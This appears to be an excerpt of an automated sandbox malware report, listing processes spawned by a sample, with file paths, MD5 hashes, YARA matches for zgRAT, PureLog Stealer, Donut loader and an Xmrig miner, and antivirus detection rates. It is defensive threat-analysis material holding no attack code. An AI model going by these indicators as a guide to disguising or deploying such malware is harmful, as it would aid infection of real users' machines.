                                                                                                                                                                                          File size:1'180'160 bytes
                                                                                                                                                                                          MD5 hash:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000009.00000003.2181775167.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                                                          • Detection: 74%, Virustotal, Browse
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                          Start time:03:26:37
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"
                                                                                                                                                                                          Imagebase:0xce0000
                                                                                                                                                                                          File size:697'856 bytes
                                                                                                                                                                                          MD5 hash:4F5771AA008FB55801A3F9FBA7130F69
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, Author: ditekSHen
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                                                          • Detection: 76%, Virustotal, Browse
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                          Start time:03:26:37
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                          Start time:03:26:38
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                          Imagebase:0xb40000
                                                                                                                                                                                          File size:262'432 bytes
                                                                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1840252168.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                          Start time:03:26:41
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:331'776 bytes
                                                                                                                                                                                          MD5 hash:848ABDBD09C052799A0E0180B59F6FEE
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                          Start time:03:26:46
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"
                                                                                                                                                                                          Imagebase:0x7ff72bec0000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                          Start time:03:26:53
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"
                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                          Start time:03:26:59
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"
                                                                                                                                                                                          Imagebase:0x2e0000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                          Start time:03:27:06
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe"
                                                                                                                                                                                          Imagebase:0xeb0000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                          Start time:03:27:13
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe"
                                                                                                                                                                                          Imagebase:0x910000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                          Start time:03:27:19
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe"
                                                                                                                                                                                          Imagebase:0xef0000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                          Start time:03:27:24
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                                                                                                                                                                                          Imagebase:0x7ff6712e0000
                                                                                                                                                                                          File size:1'180'160 bytes
                                                                                                                                                                                          MD5 hash:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2663527189.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2686476457.0000021E03768000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2661359746.0000021E031A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2689396075.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2659972614.0000021E03194000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2661205668.0000021E03151000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2686476457.0000021E03734000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2686049114.0000021E03765000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2659255671.0000021E03635000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2689396075.0000021E03062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2686476457.0000021E0372E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2686049114.0000021E0373E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2659255671.0000021E0362F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2687199973.0000021E0305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2660087797.0000021E03581000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2666668474.0000021E031A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2661521340.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2674148859.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2661677871.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2660087797.0000021E03530000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2660847616.0000021E03196000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2660087797.0000021E03567000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2660847616.0000021E03140000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2661128058.0000021E03196000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2688132576.0000021E03061000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000018.00000003.2693194416.0000021E0319A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2687808650.0000021E03516000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2687199973.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2688253860.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2686049114.0000021E03798000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2686049114.0000021E0372E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2673013794.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000018.00000003.2692757034.0000021E034D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2659255671.0000021E03669000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2660730785.0000021E03194000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2688132576.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2660087797.0000021E03537000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2661359746.0000021E0318E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2686476457.0000021E03798000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2663760300.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2662087897.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2689684395.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000018.00000003.2692958541.0000021E0318C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000003.2689532030.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                          Start time:03:27:26
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe"
                                                                                                                                                                                          Imagebase:0x8d0000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                          Start time:03:27:28
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\gtxkvh.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\gtxkvh.exe"
                                                                                                                                                                                          Imagebase:0xed0000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                          Start time:03:27:32
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                                                                                                                                                                                          Imagebase:0x7ff6712e0000
                                                                                                                                                                                          File size:1'180'160 bytes
                                                                                                                                                                                          MD5 hash:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2780772219.00000159F38CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001B.00000003.2794263235.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2783975569.00000159F3470000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2780772219.00000159F38FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2762360259.00000159F3465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2770549430.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2761279906.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759055860.00000159F38C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2778870088.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2769879693.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2801216518.00000159F3492000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2760278744.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2767124522.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759580916.00000159F3896000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2779479672.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2783103519.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2787747249.00000159F349A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2782126972.00000159F3464000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759055860.00000159F3897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2764776666.00000159F346C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2791688116.00000159F349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2785135937.00000159F345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2763426209.00000159F346C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2785229702.00000159F3610000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2780772219.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
